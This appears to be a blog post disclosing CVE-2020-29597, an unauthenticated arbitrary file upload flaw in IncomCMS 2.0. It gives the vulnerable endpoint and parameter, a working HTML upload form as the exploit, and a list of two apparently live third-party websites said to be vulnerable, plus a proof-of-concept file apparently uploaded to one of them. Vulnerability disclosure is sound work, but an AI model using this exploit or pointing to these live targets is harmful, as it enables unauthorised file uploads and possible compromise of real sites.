Skip to content
Permalink
gh-pages
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
layout title description tags
post
CVE-2020-29597 - IncomCMS 2.0 insecure files upload
IncomCMS 2.0 is vulnerable to insecure files upload
exploits bugbounty

Hi there!, I've discovered endpoint that accepts any file and upload it without any validation or even being authentication

Discovered by : Mohammed Fadhl Al-Barbari aka @m4dm0e

CVE-ID : CVE-2020-29597

Vulnerable endpoint/script : site.com/incom/modules/uploader/showcase/script.php

Vulnerability type : Insecure file upload

Tested on : IncomCMS 2.0 old versions probably vulnerable too

Uploader parameter : Filedata

Live websites :

http://mzgesheft.kz/incom/modules/uploader/showcase/script.php
http://mekom.kz/incom/modules/uploader/showcase/script.php

HTML exploit :

<!DOCTYPE html>
<html>
<head>
  <title>Upload your files</title>
</head>
<body>
  <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
    <p>Upload your file</p>
    <input type="file" name="Filedata"></input><br />
    <input type="submit" value="Upload"></input>
  </form>
</body>
</html>

POCs : http://mzgesheft.kz/upload/userfiles/image/cve.png

Thanks for reading this.